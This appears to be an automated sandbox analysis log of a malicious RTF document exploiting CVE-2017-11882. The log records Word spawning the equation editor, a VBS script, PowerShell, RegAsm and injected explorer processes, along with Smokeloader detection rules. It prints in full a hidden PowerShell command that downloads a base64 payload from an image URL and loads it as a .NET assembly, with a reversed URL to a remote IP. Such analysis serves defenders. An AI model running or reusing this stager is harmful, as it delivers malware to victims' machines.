Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_00081FE5 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
Source: C:\Windows\explorer.exe | Code function: 23_2_00065300 RtlAllocateHeap,NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_000C1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpi,CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_000C1A80 NtCreateSection,NtMapViewOfSection
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_000C1819 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
Source: C:\Windows\explorer.exe | Code function: 25_2_0006355C RtlAllocateHeap,NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_00081016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_00081B26 NtCreateSection,NtMapViewOfSection
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_000818BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
Source: C:\Windows\explorer.exe | Code function: 27_2_0006370C RtlAllocateHeap,NtUnmapViewOfSection
Source: C:\Windows\explorer.exe | File deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00554D58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00554D48
Source: C:\Windows\explorer.exe | Code function: 12_2_02802840
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C2198
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000CC2F9
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000DB35C
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_00114438
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000DB97E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C6E6A
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000E5F08
Source: C:\Windows\explorer.exe | Code function: 20_2_00061E20
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_2_0008170B
Source: C:\Windows\explorer.exe | Code function: 23_2_00062C00
Source: C:\Windows\explorer.exe | Code function: 25_2_00062054
Source: C:\Windows\explorer.exe | Code function: 25_2_00062860
Source: C:\Windows\explorer.exe | Code function: 27_2_00062A04
Source: C:\Windows\explorer.exe | Code function: 27_2_000620F4
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\gwseuha D2F0B87E2D2707685C4D35F8F05B42FB8326EF4E70D16097B8837DABA06AC961
Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 000C8801 appears 40 times
Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 000C7F70 appears 32 times
Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf, type: SAMPLE | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.bank.troj.spyw.expl.evad.winRTF@36/20@10/3
Source: C:\Windows\explorer.exe | Code function: 12_2_02803BF4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,SleepEx
Source: C:\Windows\explorer.exe | Code function: 12_2_028035E8 CoCreateInstance
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf
Source: C:\Users\user\AppData\Roaming\gwseuha | Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR69E9.tmp
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................T.r.u.e.(.P..............................*.........................s............................0...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ....................................u.e.(.P..............................*.........................s............................X...............
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfVirustotal: Detection: 50%
            Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfReversingLabs: Detection: 50%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated base64 string omitted]'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: unknown | Process created: C:\Windows\System32\taskeng.exe taskeng.exe {B5E7D6C9-0A45-4095-9C68-D1725C8390DE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
            Source: C:\Windows\System32\taskeng.exe | Process created: C:\Users\user\AppData\Roaming\gwseuha C:\Users\user\AppData\Roaming\gwseuha
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated base64 string omitted]'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\System32\taskeng.exe | Process created: C:\Users\user\AppData\Roaming\gwseuha C:\Users\user\AppData\Roaming\gwseuha
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: propsys.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: ntmarta.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: credssp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
            Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\explorer.exe | Section loaded: webio.dll
            Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
            Source: C:\Windows\System32\taskeng.exe | Section loaded: ktmw32.dll
